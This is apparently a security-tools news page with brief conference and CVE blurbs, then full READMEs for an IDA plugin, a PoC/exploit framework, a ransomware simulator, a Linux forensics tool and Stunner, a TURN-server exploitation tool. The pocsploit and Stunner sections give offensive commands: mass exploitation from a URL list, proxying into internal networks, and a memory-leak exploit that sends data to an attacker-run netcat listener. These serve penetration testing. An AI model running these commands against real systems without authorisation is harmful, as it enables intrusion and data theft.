
Enumdb Beta – Brute Force MySQL and MSSQL Databases

Enumdb is a brute-force and post-exploitation tool for MySQL and MSSQL databases. When provided a list of usernames and/or passwords, it will cycle through each looking for valid credentials. By...

Black Hat Arsenal USA 2018 – Call For Tools (Now Closed)

The Black Hat Arsenal team will once again provide hackers & security researchers the opportunity to demo their newest and latest code! The Arsenal tool demo area is dedicated to independent...

T.rex_scan v0.2 – Integrate Tools to Audit Web Sites

T.rex_scan only facilitates visualization when auditing a web page. With this script you can optimize your time, reducing the time you spend auditing a web page, since T.rex_scan executes the task you...

Purplemet – Online Tool To Detect WebApp Technologies

Purplemet Security provides an efficient and fast way to detect the technologies used on a web application, as well as their versions. It comes with 3 main features: Real-time Purplemet technology...

Black Hat Arsenal USA 2018 – The "w0w" Lineup!!

Just wow. Finally, after a few days of reviewing, selecting, unselecting, doubting, screaming and re-reviewing, the Black Hat & ToolsWatch teams released the selected tools for the USA...

Recon Village @ DEFCON 2018 (Hackathon)

ToolsWatch likes open source tools; for that reason we will participate in Recon Village @ DEF CON 2018 as part of the jury. Maxi Soler will be there 🙂 Recon Village is an Open Space with Talks,...

Blackhat Arsenal Europe 2018 CFT Open

The Black Hat Arsenal team is heading to London with the very same goal: give hackers & security researchers the opportunity to demo their newest and latest code. The Arsenal tool demo area is...

HITB Armory – Call for Tools is OPEN! (Dubai, UAE)

We’re pleased to announce the first ever HackInTheBox Armory! The HITB Armory is where you can showcase your security tools to the world. You will get 30 minutes to present your tools onstage,...

Black Hat Arsenal Europe 2018 Lineup Announced

After days of reviewing the hundreds of submitted tools, the ToolsWatch and Black Hat teams selected 50 tools. They will be demonstrated over 2 days, the 5th and 6th of December 2018, at the ExCeL London...

Black Hat Arsenal Asia 2019 CFT Open

The Black Hat Arsenal team will be back in Singapore with the very same goal: give hackers & security researchers the opportunity to demo their newest and latest code. The Arsenal tool demo area...

Black Hat Arsenal Asia 2019 Lineup Announced

The Black Hat Arsenal event is back in Singapore after a successful session in London. In case you are attending Black Hat Asia 2019, do not forget to stop by the Arsenal, because we have selected...

Amazing Black Hat Arsenal USA 2019 Lineup Announced

After days of thorough reviewing, the whole Arsenal team has selected nearly 94 tools. Most of them will be released during the event. This USA session will also introduce a new daily meet-up in the...

Introducing the 1st Arsenal Lab USA 2019

After several years of dazzling success for the famous Black Hat Arsenal, the team brainstormed to offer some new entertainment. Several ideas were reviewed; however, the principle of an interactive hardware space was retained. So, exclusively at Black Hat Arsenal, we introduce the first Arsenal Lab USA 2019, held on 2 consecutive days. […]

Objective By The Sea & ToolsWatch To Organize The First Edition Of macOS β€œAloha” Armory (CLOSED)

We are extremely pleased and excited to announce our recent partnership with the renowned Objective By The Sea to promote a security & hacking tools demonstration area exclusively macOS oriented....

Top 5 Critical CVE Vulnerabilities From 2019 That Every CISO Must Patch Before Getting Fired!

The number of vulnerabilities continues to increase so much that the technical teams in charge of patch management find themselves drowning in a myriad of critical and urgent tasks. Therefore, we have taken the time to review the profiles of the most critical vulnerabilities & issues that impacted 2019. After this frenzy during […]

CVE In The Hook – Monthly Vulnerability Review (January 2020 Issue)

Every day, new common vulnerabilities and exploits are publicly exposed. While this brings these flaws

CVE In The Hook – Monthly Vulnerability Review (February 2020 Issue)

Almost for as long as computers have been around, there have been vulnerabilities and individuals

vFeed, Inc. Introduces Vulnerability Common Patch Format Feature

New Feature! Vulnerability Common Patch Format. vFeed Vulnerability Intelligence Service was created to provide correlation

Top 10 Most Exploited Vulnerabilities in 2020

We delved into the tons of vulnerability intelligence data we accumulated over the years. I

Top 10 Most Used MITRE ATT&CK Tactics & Techniques In 2020

MITRE’s Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK) is a curated knowledge base and model

Top Twenty Most Exploited Vulnerabilities in 2021

The number of vulnerabilities in 2021 has dramatically increased, so much so that the technical teams in […]

FindFunc - Advanced Filtering/Finding of Functions in IDA Pro


FindFunc is an IDA Pro plugin for finding code functions that contain a certain assembly or byte pattern, reference a certain name or string, or conform to various other constraints. It is not a competitor to tools like Diaphora or BinNavi; rather, it is ideal for finding a known function in a new binary in cases where classical bindiffing fails.


Filtering with Rules

The main functionality of FindFunc is letting the user specify a set of "Rules" or constraints that a code function in IDA Pro has to satisfy. FF will then find and list all functions that satisfy ALL rules (so currently all Rules are in an AND-conjunction). Exception: Rules can be "inverted" to be negative matches. Such rules thus conform to "AND NOT".

FF will schedule the rules in a smart order to minimize processing time. Feature overview:

  • Currently 6 Rules available, see below
  • Code matching respects Addressing-Size-Prefix and Operand-Size-Prefix
  • Aware of function chunks
  • Smart scheduling of rules for performance
  • Saving/Loading rules from/to file in simple ascii format
  • Several independent Tabs for experimentation
  • Copying rules between Tabs via clipboard (same format as file format)
  • Saving entire session (all tabs) to file
  • Advanced copying of instruction bytes (all, opcodes only, all except immediates)

Button "Search Functions" clears existing results and starts a fresh search, "Refine Results" considers only results of the previous search.

Advanced Binary Copying

A secondary feature of FF is the option to copy the binary representation of instructions, with the following options:

  • copy all -> copy all bytes to the clipboard
  • copy without immediates -> blank out (AA ?? BB) any immediate values in the instruction bytes
  • opcode only -> will blank out everything except the actual opcode(s) of the instruction (and prefixes)

See "advanced copying" section below for details. This feature nicely complements the Byte Pattern rule!

Building and Installation

FindFunc is an IDA Pro python plugin without external package dependencies. It can be installed by downloading the repository and copying file findfuncmain.py and folder findfunc to your IDA Pro plugin directory. No building is required.

Requirements: IDA Pro 7.x (7.6+) with python3 environment. FindFunc is designed for x86/x64 architecture only. It has been tested with IDA 7.6/7.7, python 3.9 and IDAPython 7.4.0 on Windows 10.

Available Rules

Currently the following six rules are available. They are sorted here from heavy to light with regard to performance impact. With large databases it is a good idea to first cut down the candidate-functions with a cheap rule, before doing heavy matching via e.g. Code Rules. FF will automatically schedule rules in a smart way.

Code Pattern

Rule for filtering functions based on whether they contain a given assembly code snippet. This is NOT a text search over IDA's textual disassembly representation; rather, it performs advanced matching of the underlying instructions. The snippet may contain many consecutive instructions, one per line. Function chunks are supported. In addition to literal assembly, special wildcard matching is supported:

  • "pass" -> matches any instruction with any operands
  • "mov* any,any" -> matches instructions with mnemonic "mov*" (e.g. mov, movzx, ...) and any two arguments.
  • "mov eax, r32" -> matches any instruction with mnemonic "mov", first operand register eax and second operand any 32-bit register.
    • Analogue: r for any register, r8/r16/r32/r64 for register of a specific width, "imm" for any immediate
  • "mov r64, imm" -> matches any move of a constant to a 64bit register
  • "any r64,r64" -> matches any operation between two 64bit registers
  • mov -> matches any instruction of mov mnemonic

more examples:

mov r64, [r32 * 8 + 0x100]
mov r, [r * 8 - 0x100]
mov r64, [r32 * 8 + imm]
pass
mov r, word [eax + r32 * 8 - 0x100]
any r64, r64
push imm
push any

Gotchas: Be careful when copying assembly over from IDA. IDA mingles local variable names and other information into the instruction, which leads to matching failures. Also, labels are not supported ("call sub_123456").

Note that the Code Pattern rule is the most expensive, and if only Code Rules are present FF has no option but to disassemble the entire database. This can take up to several minutes for very large binaries. See the notes on performance below.

Immediate Value (Constant)

The function must contain the given immediate at least once in any position. An immediate value is a value fixed in the binary representation of the instruction. Examples for instructions matching immediate value 0x100:

mov eax, 0x100
mov eax, [0x100]
and al, [eax + ebx*8 + 0x100]
push 0x100

Note: IDA performs extensive matching of any size and any position of the immediate. If you know it to be of a specific width of 4 or 8 bytes, a byte pattern can be a little faster.

Byte Pattern

The function must contain the given byte pattern at least once. The pattern is of the same format as IDAs binary search, and thus supports wildcards - the perfect match for the advanced-copy feature!

Examples:

11 22 33 44 aa bb cc
11 22 33 ?? ?? bb cc -> ?? can be any byte

Note: Pattern matching is quite fast and a good candidate to cut down matches quickly!

String Reference

The function must reference the given string at least once. The string is matched according to Python's 'fnmatch' module, and thus supports wildcard-like matching (see the sketch after the examples below). Matching is performed case-insensitively. Strings of the following formats are considered: [idaapi.STRTYPE_C, idaapi.STRTYPE_C_16] (this can be changed in the Config class).

Examples:

  • "TestString" -> function must reference the exact string (casing ignored) at least once
  • "TestStr*" -> function must reference a string starting with 'TestStr (e.g. TestString, TestStrong) at least once (casing ignored)

Note: String matching is fast and a good choice to cut down candidates quickly!
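
For reference, a minimal sketch of the wildcard semantics in plain Python, assuming fnmatch-style matching with both sides lowercased (the function name here is illustrative, not FF's actual code):

from fnmatch import fnmatch

def string_rule_matches(referenced_string, pattern):
    # Lowercasing both sides approximates FF's case-insensitive matching,
    # independent of platform-specific fnmatch behaviour.
    return fnmatch(referenced_string.lower(), pattern.lower())

print(string_rule_matches("TestString", "TestStr*"))  # True
print(string_rule_matches("MyString", "TestStr*"))    # False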

Name Reference

The function must reference the given name/label at least once. The name/label is matched according to Python's 'fnmatch' module, and thus supports wildcard-like matching. Matching is performed case-insensitively.

Examples:

  • "memset" -> function must reference a location named "memset" at least once
  • "mem*" -> function must reference a location starting with "mem" (memset, memcpy, memcmp) at least once

Note: Name matching is very fast and ideal to cut down candidates quickly!

Function Size

The size of the function must be within the given limit: "min <= functionsize <= max". Data is entered as a string of the form "min,max". The size of a function includes all of its chunks.

Note: Function size matching is very fast and ideal to cut down candidates quickly!
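
As a sketch, the "min,max" check boils down to the following (a hypothetical helper, not FF's code):

def size_rule_matches(func_size, data):
    # data is the rule input of the form "min,max", e.g. "32,256"
    lo, hi = (int(x) for x in data.split(","))
    return lo <= func_size <= hi

print(size_rule_matches(100, "32,256"))  # True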

Keyboard Shortcuts & GUI

For ease of use FF can be used via the following keyboard shortcuts:

  • Ctrl+Alt+F -> launch/show TabWidget (main GUI)
    • Or View->FindFunc
  • Ctrl+F -> start search with currently enabled rules
  • Ctrl+R -> refine existing results with currently enabled rules
  • Rules
    • Ctrl+C -> copy selected rules to clipboard
    • Ctrl+V -> paste rules from clipboard into current tab (appends)
    • Ctrl+S -> save selected rules to file
    • Ctrl+L -> load selected rules from file (appends)
    • Ctrl+A -> select all rules
    • Del -> delete selected rules
  • Save Session
    • Ctrl+Shift+S -> Save session to file
    • Ctrl+Shift+L -> Load session from file

Further GUI usage

  • Rules can be edited by double-clicking the Data column
  • Rules can be inverted (negative match) by double-clicking the invert-match column
  • Rules can be enabled/disabled by double-clicking the enabled-column
  • Tabs can be renamed by double-clicking them
  • Sorting is supported both for Rule-List and Result-List
  • Double-click Result item to jump to it in IDA
    • function name: jump to function start
    • any other column: jump to match of last matched rule
  • Checkbox Profile: Outputs profiling information for the search
  • Checkbox Debug: Dumps detailed debugging output for code rule matching - only use it if few functions make it to the code checking rule, otherwise it might take very long!

Advanced Binary Copy

Frequently we want to search for binary patterns of assembly, but without hardcoded addresses and values (immediates), or even with only the actual opcodes of the instruction. FindFunc makes this easy by adding three copy options to the disassembly popup menu:

Copy all bytes

Copies all instruction bytes as hex-string to clipboard, for use in a Byte-Pattern-Rule (or IDAs binary search).

B8 44332211     mov eax,11223344
68 00000001     push 1000000
66:894424 70    mov word ptr ss:[esp+70],ax

will be copied as

b8 44 33 22 11 68 00 00 00 01 66 89 44 24 70

Copy only non-immediate bytes

Copies instruction bytes for given instruction, masking out any immediate values. Example:

B8 44332211     mov eax,11223344
68 00000001     push 1000000
66:894424 70    mov word ptr ss:[esp+70],ax

will be copied as

b8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 66 89 44 24 ??

Copy only opcodes

Copy all instruction bytes as hex-string to clipboard, masking out any bytes that are not the actual opcode (including sib, modrm, but keeping legacy prefixes).

B8 44332211     mov eax,11223344
68 00000001     push 1000000
66:894424 70    mov word ptr ss:[esp+70],ax

will be copied as

b8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 66 89 ?? ?? ??

Note: This is a "best effort" using IDAs API, thus there may be few cases where it only works partially. For a 100% correct solution we would have to ship a dedicated x86 disasm library.

Similar results can be achieved with Code Pattern Rules, but this might be faster, both for user interaction and the actual search.
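
To illustrate the masking shown above, here is a minimal Python sketch; the immediate offsets are hardcoded for the example instruction, whereas FF derives them from IDA's instruction decoding:

def mask_immediates(instr_bytes, imm_ranges):
    # Replace every byte covered by an immediate operand with "??".
    out = []
    for i, b in enumerate(instr_bytes):
        masked = any(start <= i < start + length for start, length in imm_ranges)
        out.append("??" if masked else format(b, "02x"))
    return " ".join(out)

# "mov eax, 11223344": opcode B8 followed by a 4-byte immediate at offset 1
print(mask_immediates(bytes.fromhex("b844332211"), [(1, 4)]))  # b8 ?? ?? ?? ??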

Copy disasm

Copies selected disassembly to clipboard, as it appears in IDA.

Performance

A brief word on performance:

  1. name, string, funcsize are almost free in all cases
  2. bytepattern is almost free for patterns of length > 2
  3. immediate is difficult: we can use the idaapi search, or we can disassemble the entire database and search ourselves - we may have to do the latter anyway if we are looking for code patterns. BUT: scanning for code patterns is in fact much cheaper than scanning for an immediate. An api-search for all matches is relatively costly - about 1/8 as costly as disassembling the entire database. So: if we cut down matches with cheap rules first, we profit greatly from disassembling the remaining functions and looking for the immediate ourselves, especially if a code rule is present anyway. However: if no cheap options exist and we have to disassemble large parts of the database anyway (due to the presence of code pattern rules), then using one immediate rule as a pre-filter can pay off greatly. Api-searching ONE immediate is roughly equivalent to 1/8 of searching for any number of code-pattern rules - although this also depends on many different factors...
  4. code patterns are the most expensive by far; however, checking one pattern vs. checking many costs about the same.

Todo (unordered):

  • jcc pseudo-mnemonic
  • Allow named locations in CodeRules ('call memset')
  • 'ignore all following operands' option
  • Rule for parameters to API calls inside function
  • Rule for parent/callsite/child function requirements
  • Rule for function parameters
  • Regex-rule
  • string/name: casing option
  • automatically convert immediate rules to byte pattern if applicable?
  • settings: case sensitivity, string types, range, ...
  • Hexray rules?
  • OR combination of rules
  • Pythonification of code ;)
  • Parallelization
  • Automatic generation of rules to identify a function?


Pocsploit - A Lightweight, Flexible And Novel Open Source Poc Verification Framework


pocsploit is a lightweight, flexible and novel open source PoC verification framework.

Pain points of existing PoC frameworks on the market

  1. There are too many params; it's hard to know how to get started, yet only some of them are commonly used.
  2. YAML PoC frameworks (like nuclei & xray) are not flexible enough: the conversion cost is high when writing PoCs, and they sometimes struggle with non-HTTP protocols (only hex can be used).
  3. PoCs sometimes yield false positives, which can be avoided by accurate fingerprint matching.
  4. Heavy dependence on the framework. A PoC in pocsploit can be used within the framework and can also be used alone.

Advantages of pocsploit

  1. Lighter: does not depend on the framework; a single PoC can run on its own (see the sketch after this list)
  2. Easier to write and rewrite PoCs
  3. More flexible (compared to nuclei, xray, goby, etc.)
  4. Fewer false positives: fingerprint prerequisite judgment lets you first check whether the site has the fingerprint of a certain component, and then perform PoC verification, which is more accurate
  5. Many ways to use it, providing both poc and exp
  6. Detailed vulnerability information display
  7. PoC ecosystem sustainability: I will continue adding PoCs to modules/, and everyone is welcome to contribute PoCs
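
To illustrate the standalone idea, here is a hypothetical, framework-independent PoC in the spirit of the above; the endpoint path and response marker are made-up placeholders, and this is not pocsploit's actual module interface:

import requests

def verify(target):
    # Placeholder check: request a path and look for a telltale marker.
    try:
        resp = requests.get(target + "/vulnerable-endpoint", timeout=10)
    except requests.RequestException:
        return False
    return resp.status_code == 200 and "vulnerable-marker" in resp.text

if __name__ == "__main__":
    print(verify("http://127.0.0.1:8080"))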

If you encounter code/PoC issues, please submit an issue.

PoC Statistics

cve    cnnvd    others
345    7        102

Usage

Install requirements

pip3 install -r requirements.txt
  • Verify a single website with a PoC
python3 pocsploit.py -iS "http://xxxx/" -r "modules/" -t 100 --poc
  • Run a specific PoC
python3 pocsploit.py -iS "http://xxxxx" -r "modules/vulnerabilities/thinkphp/thinkphp-5022-rce.py" --poc
  • Use exp to exploit many websites (with URLs in a file)
python3 pocsploit.py -iF "urls.txt" -r "modules/vulnerabilities/" --exp
  • Turn on fingerprint pre-verification: verify the fingerprint first, and only enter PoC verification after a match
python3 pocsploit.py -iS "http://xxxxx" -r "modules/vulnerabilities/thinkphp/thinkphp-5022-rce.py" --poc --fp
  • Output to file & console quiet mode
python3 pocsploit.py -iS "http://xxxx" -r "modules/vulnerabilities/" --poc -o result/result.log -q
  • Other usage
python3 pocsploit.py --help



Others

OOB

Please configure conf/config.py (a placeholder sketch follows the list below).

P.S. To build your own DNSLog, please visit Hyuga-DNSLog.

  • DNSLOG_URI: DNSLog Address
  • DNSLOG_TOKEN: Token
  • DNSLOG_IDENTIFY: your identity
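
A placeholder sketch of what conf/config.py might look like, based only on the keys listed above (all values are made up):

# conf/config.py -- placeholder values, replace with your own DNSLog setup
DNSLOG_URI = "http://your.dnslog.example"  # DNSLog address
DNSLOG_TOKEN = "your-token"                # API token
DNSLOG_IDENTIFY = "your-identity"          # your identity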


Ransomware-Simulator - Ransomware Simulator Written In Golang


The goal of this repository is to provide a simple, harmless way to check your AV's protection against ransomware.

This tool simulates typical ransomware behaviour, such as:

  • Staging from a Word document macro
  • Deleting Volume Shadow Copies
  • Encrypting documents (embedded and dropped by the simulator into a new folder)
  • Dropping a ransomware note to the user's desktop

The ransomware simulator takes no action that actually encrypts pre-existing files on the device, or deletes Volume Shadow Copies. However, any AV products looking for such behaviour should still hopefully trigger.

Each step, as listed above, can also be disabled via a command line flag. This allows you to check responses to later steps as well, even if an AV already detects earlier steps.
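
The harmless-by-design idea can be sketched as follows; this is an illustrative Python rendering of the concept, not the tool's Go implementation, and all names are made up:

import os
import secrets

def simulate_encryption(stage_dir="./encrypted-files"):
    # Only touches files this function creates itself -- never user data.
    os.makedirs(stage_dir, exist_ok=True)
    key = secrets.token_bytes(32)
    for i in range(5):
        plain = os.path.join(stage_dir, "document-%d.txt" % i)
        with open(plain, "wb") as f:
            f.write(b"dummy content dropped by the simulator")
        with open(plain, "rb") as f:
            data = f.read()
        encrypted = bytes(b ^ key[j % 32] for j, b in enumerate(data))
        with open(plain + ".encrypted", "wb") as f:
            f.write(encrypted)
        os.remove(plain)  # remove only our own dropped file

simulate_encryption()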


Usage

Run command:

Run Ransomware Simulator

Usage:
  ransomware-simulator run [flags]

Flags:
      --dir string                     Directory where files that will be encrypted should be staged (default "./encrypted-files")
      --disable-file-encryption        Don't simulate document encryption
      --disable-macro-simulation       Don't simulate start from a macro by building the following process chain: winword.exe -> cmd.exe -> ransomware-simulator.exe
      --disable-note-drop              Don't drop pseudo ransomware note
      --disable-shadow-copy-deletion   Don't simulate volume shadow copy deletion
  -h, --help                           help for run
      --note-location string           Ransomware note location (default "C:\\Users\\neo\\Desktop\\ransomware-simulator-note.txt")



LEAF - Linux Evidence Acquisition Framework


Linux Evidence Acquisition Framework (LEAF) acquires artifacts and evidence from Linux EXT4 systems, accepting user input to customize the tool's functionality for easier scalability. Offering several modules and parameters as input, LEAF uses smart analysis to extract Linux artifacts and output them to an ISO image file.


Usage

LEAF_master.py [-h] [-i INPUT [INPUT ...]] [-o OUTPUT] [-u USERS [USERS ...]] [-c CATEGORIES [CATEGORIES ...]] [-v]
[-s] [-g [GET_FILE_BY_OWNER [GET_FILE_BY_OWNER ...]]] [-y [YARA [YARA ...]]]
[-yr [YARA_RECURSIVE [YARA_RECURSIVE ...]]] [-yd [YARA_DESTINATIONS [YARA_DESTINATIONS...]]]

LEAF (Linux Evidence Acquisition Framework) - Cartware
[LEAF ASCII-art banner] v2.0

Process Ubuntu 20.04/Debian file systems for forensic artifacts, extract important data, and export information to an ISO9660 file. Compatible with the EXT4 file system and common locations on the Ubuntu 20.04 operating system. See the help page for more information. Suggested usage: do not run from the LEAF/ directory.

Parameters

optional arguments:

-h, --help show this help message and exit

-i INPUT [INPUT ...], --input INPUT [INPUT ...]
Additional Input locations. Separate multiple input files with spaces
Default: /home/user1/Desktop/LEAF-3/target_locations

-o OUTPUT, --output OUTPUT

Output directory location

Default: ./LEAF_output

-u USERS [USERS ...], --users USERS [USERS ...]

Users to include in output, separated by spaces (i.e. -u alice bob root).
Users not present in /etc/passwd will be removed
Default: All non-service users in /etc/passwd
-c CATEGORIES [CATEGORIES ...], --categories CATEGORIES [CATEGORIES ...]
Explicit artifact categories to include during acquisition.
Categories must be separated by spaces (i.e. -c network users apache).
The full list of built-in categories includes:
APPLICATIONS, EXECUTIONS, LOGS, MISC, NETWORK, SHELL, STARTUP, SERVICES, SYSTEM, TRASH, USERS
Categories are compatible with user-inputted files as long as they follow the notation:
# CATEGORY
/location1
/location2
.../location[n]
# END CATEGORY
Default: "all"
-v, --verbose Output in verbose mode, (may conflict with progress bar)
Default: False
-s, --save Save the raw evidence directory
Default: False
-g [GET_OWNERSHIP [GET_OWNERSHIP ...]], --get_ownership [GET_OWNERSHIP [GET_OWNERSHIP ...]]
Get files and directories owned by included users.
Enabling this will increase parsing time.
Use -g alone to parse from the / root directory.
Include paths after -g to specify target locations (i.e. "-g /etc /home/user/Downloads/").
Default: Disabled
-y [YARA [YARA ...]], --yara [YARA [YARA ...]]
Configure Yara IOC scanning. Select -y alone to enable Yara scanning.
Specify '-y /path/to/yara/' to specify a custom input location.
For multiple inputs, use spaces between items,
i.e. '-y rulefile1.yar rulefile2.yara rule_dir/'
All yara files must have the ".yar" or ".yara" extension.
Default: None
-yr [YARA_RECURSIVE [YARA_RECURSIVE ...]], --yara_recursive [YARA_RECURSIVE [YARA_RECURSIVE ...]]
Configure Recursive Yara IOC scanning.
For multiple inputs, use spaces between items,
i.e. '-yr rulefile1.yar rulefile2.yara rule_dir/'.
Directories in this list will be scanned recursively.
Can be used in conjunction with the normal -y flag,
but intersecting directories will take recursive priority.
Default: None
-yd [YARA_DESTINATIONS [YARA_DESTINATIONS...]], --yara_destinations [YARA_DESTINATIONS [YARA_DESTINATIONS...]]
Destination to run yara files against.
Separate multiple targets with a space.(i.e. /home/alice/ /bin/star/)
Default: All user directories

Example Usages:

To use default arguments [this will use default input file (./target_locations), users (all users), categories (all categories), and output location (./LEAF_output/). Cloned data will not be stored in a local directory, verbose mode is off, and yara scanning is disabled]:
LEAF_main.py

All arguments:
LEAF_main.py -i /home/alice/Desktop/customfile1.txt -o /home/alice/Desktop/ExampleOutput/ -c logs startup services apache -u alice bob charlie -s -v -y /path/to/yara_rule1.yar -yr /path2/to/yara_rules/ -yd /home/frank -g /etc/

To specify usernames, categories, and yara files:
LEAF_main.py -u alice bob charlie -c applications executions users -y /home/alice/Desktop/yara1.yar /home/alice/Desktop/yara2.yar

To include custom input file(s) and categories:
LEAF_main.py -i /home/alice/Desktop/customfile1.txt /home/alice/Desktop/customfile2.txt -c apache xampp

How to Use

  • Install Python requirements:
    • Python 3 (preferably 3.8 or higher) (apt install python3)
    • pip3 (apt install python3-pip)
  • Download required modules
    • Install modules from requirements.txt (pip3 install -r requirements.txt)
    • If you get an installation error, try sudo -H pip3 install -r requirements.txt
  • Run the script
    • sudo python3 LEAF_master.py with optional arguments


Stunner - Tool To Test And Exploit STUN, TURN And TURN Over TCP Servers


Stunner is a tool to test and exploit STUN, TURN and TURN over TCP servers. TURN is a protocol mostly used in videoconferencing and audio chats (WebRTC).

If you find a misconfigured server you can use this tool to open a local socks proxy that relays all traffic via the TURN protocol into the internal network behind the server.

I developed this tool during a test of Cisco Expressway which resulted in some vulnerabilities: https://firefart.at/post/multiple_vulnerabilities_cisco_expressway/

To get the required username and password you need to fetch them using an out-of-band method like sniffing the Connect request from a web browser with Burp. I added an example workflow at the bottom of the readme on how you would test such a server.


LICENSE

This work is licensed under the Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License. To view a copy of this license, visit http://creativecommons.org/licenses/by-nc-sa/4.0/ or send a letter to Creative Commons, PO Box 1866, Mountain View, CA 94042, USA.

implemented RFCs

STUN: RFC 5389

TURN: RFC 5766

TURN for TCP: RFC 6062

TURN Extension for IPv6: RFC 6156

Available Commands

info

This command will print some info about the STUN or TURN server, like supported protocols and attributes such as the software used.

Options

--debug, -d                   enable debug output (default: false)
--turnserver value, -s value  turn server to connect to in the format host:port
--tls                         Use TLS for connecting (false in most tests) (default: false)
--timeout value               connect timeout to turn server (default: 1s)
--help, -h                    show help (default: false)

Example

./stunner info -s x.x.x.x:443

range-scan

This command tries several private and restricted ranges to see if the TURN server is configured to allow connections to the specified IP addresses. If a specific range is not prohibited, you can enumerate it further with the other provided commands. If an IP is reachable, it means the TURN server will forward traffic to it.

Options

--debug, -d                   enable debug output (default: false)
--turnserver value, -s value  turn server to connect to in the format host:port
--tls                         Use TLS for connecting (false in most tests) (default: false)
--protocol value              protocol to use when connecting to the TURN server. Supported values: tcp and udp (default: "udp")
--timeout value               connect timeout to turn server (default: 1s)
--username value, -u value    username for the turn server
--password value, -p value    password for the turn server
--help, -h                    show help (default: false)

Example

TCP based TURN connection (connection from you to the TURN server):

./stunner range-scan -s x.x.x.x:3478 -u username -p password --protocol tcp

UDP based TURN connection (connection from you to the TURN server):

./stunner range-scan -s x.x.x.x:3478 -u username -p password --protocol udp

socks

This is one of the most useful commands for TURN servers that support TCP connections to backend servers. It will launch a local socks5 server with no authentication and relay all TCP traffic over the TURN protocol (UDP via SOCKS is currently not supported). If the server is misconfigured, it will forward the traffic to internal addresses, so this can be used to reach internal systems and abuse the server as a proxy into the internal network. If you choose to also do DNS lookups over SOCKS, they will be resolved using your local nameserver, so it's best to work with private IPv4 and IPv6 addresses. Please be aware that this module can only relay TCP traffic.

Options

--debug, -d                   enable debug output (default: false)
--turnserver value, -s value  turn server to connect to in the format host:port
--tls                         Use TLS for connecting (false in most tests) (default: false)
--protocol value              protocol to use when connecting to the TURN server. Supported values: tcp and udp (default: "udp")
--timeout value               connect timeout to turn server (default: 1s)
--username value, -u value    username for the turn server
--password value, -p value    password for the turn server
--listen value, -l value      Address and port to listen on (default: "127.0.0.1:1080")
--drop-public, -x             Drop requests to public IPs. This is handy if the target can not connect to the internet and your browser wants to check TLS certificates via the connection. (default: true)
--help, -h                    show help (default: false)

Example

./stunner socks -s x.x.x.x:3478 -u username -p password -x

After starting the proxy, open your browser, point the proxy in your settings to socks5 with an IP of 127.0.0.1:1080 (be sure not to set the bypass-local-addresses option, as we want to reach the remote local addresses) and call the IP of your choice in the browser.

Example: https://127.0.0.1, https://127.0.0.1:8443 or https://[::1]:8443 (those will call the ports on the tested TURN server from the local interfaces).

You can also configure proxychains to use this proxy (but it will be very slow as each request results in multiple requests to enable the proxying). Just edit /etc/proxychains.conf and enter the value socks5 127.0.0.1 1080 under ProxyList.

Example of nmap over this socks5 proxy with a correctly configured proxychains (note the -sT to do full TCP connects, otherwise it will not use the socks5 proxy):

sudo proxychains nmap -sT -p 80,443,8443 -sV 127.0.0.1

brute-transports

This will most likely yield no usable information, but can be useful to enumerate all available transports (= protocols to internal systems) supported by the server. It might show some custom protocol implementations, but mostly will only return the defaults.

Options

--debug, -d                   enable debug output (default: false)
--turnserver value, -s value  turn server to connect to in the format host:port
--tls                         Use TLS for connecting (false in most tests) (default: false)
--protocol value              protocol to use when connecting to the TURN server. Supported values: tcp and udp (default: "udp")
--timeout value               connect timeout to turn server (default: 1s)
--username value, -u value    username for the turn server
--password value, -p value    password for the turn server
--help, -h                    show help (default: false)

Example

./stunner brute-transports -s x.x.x.x:3478 -u username -p password

memoryleak

This attack works the following way: the server takes the data to send to a target (which must be a high port > 1024 in most cases) as a TLV (Type Length Value). This exploit uses a big length with a short value. If the server does not check the boundaries of the TLV, it might send memory up to the declared length to the target. Cisco Expressway was confirmed vulnerable to this, but according to Cisco it only leaked memory of the current session.
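
Conceptually, a STUN/TURN attribute is TLV-encoded with a 16-bit type and a 16-bit length, so a lying length field can be sketched like this (illustrative Python, not Stunner's code; the attribute type is a placeholder):

import struct

attr_type = 0x0013        # TURN DATA attribute (illustrative choice)
claimed_length = 35510    # the length we claim to be sending
value = b"A" * 4          # what we actually send
malformed = struct.pack(">HH", attr_type, claimed_length) + value
# A server that trusts claimed_length without bounds checking may read
# (and relay to the target) bytes far past the real value.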

Options

--debug, -d                   enable debug output (default: false)
--turnserver value, -s value  turn server to connect to in the format host:port
--tls                         Use TLS for connecting (false in most tests) (default: false)
--protocol value              protocol to use when connecting to the TURN server. Supported values: tcp and udp (default: "udp")
--timeout value               connect timeout to turn server (default: 1s)
--username value, -u value    username for the turn server
--password value, -p value    password for the turn server
--target value, -t value      Target to leak memory to in the form host:port. Should be a public server under your control
--size value                  Size of the buffer to leak (default: 35510)
--help, -h                    show help (default: false)

Example

To receive the data we need to set up a receiver on a server with a public IP. Normally firewalls are configured to only allow high ports (> 1024) from TURN servers, so be sure to use a high port like 8080 in this example when connecting out to the internet. For example, a UDP netcat listener:

sudo nc -u -l -n -v -p 8080

Then execute the following statement on your machine, putting the public IP of the receiver into the -t parameter:

./stunner memoryleak -s x.x.x.x:3478 -u username -p password -t y.y.y.y:8080

If it works you should see big loads of memory coming in, otherwise you will only see short messages.

udp-scanner

If a TURN server allows UDP connections to targets, this scanner can be used to scan all private IP ranges and send them SNMP and DNS requests. As this checks a lot of IPs it can take multiple days to complete, so use with caution or specify smaller targets via the parameters. You need to supply an SNMP community string that will be tried and a domain name that will be resolved on each IP. For the domain name you can, for example, use Burp Collaborator.

Options

--debug, -d                   enable debug output (default: false)
--turnserver value, -s value  turn server to connect to in the format host:port
--tls                         Use TLS for connecting (false in most tests) (default: false)
--protocol value              protocol to use when connecting to the TURN server. Supported values: tcp and udp (default: "udp")
--timeout value               connect timeout to turn server (default: 1s)
--username value, -u value    username for the turn server
--password value, -p value    password for the turn server
--community-string value      SNMP community string to use for scanning (default: "public")
--domain value                domain name to resolve on internal DNS servers during scanning
--ip value                    Scan single IP instead of whole private range. If left empty all private ranges are scanned. Accepts single IPs or CIDR format. (accepts multiple inputs)
--help, -h                    show help (default: false)

Example

./stunner udp-scanner -s x.x.x.x:3478 -u username -p password --community-string public --domain your-domain.example

tcp-scanner

Same as udp-scanner, but sends out HTTP requests to the specified ports (HTTPS is not supported).

Options

--debug, -d                   enable debug output (default: false)
--turnserver value, -s value  turn server to connect to in the format host:port
--tls                         Use TLS for connecting (false in most tests) (default: false)
--protocol value              protocol to use when connecting to the TURN server. Supported values: tcp and udp (default: "udp")
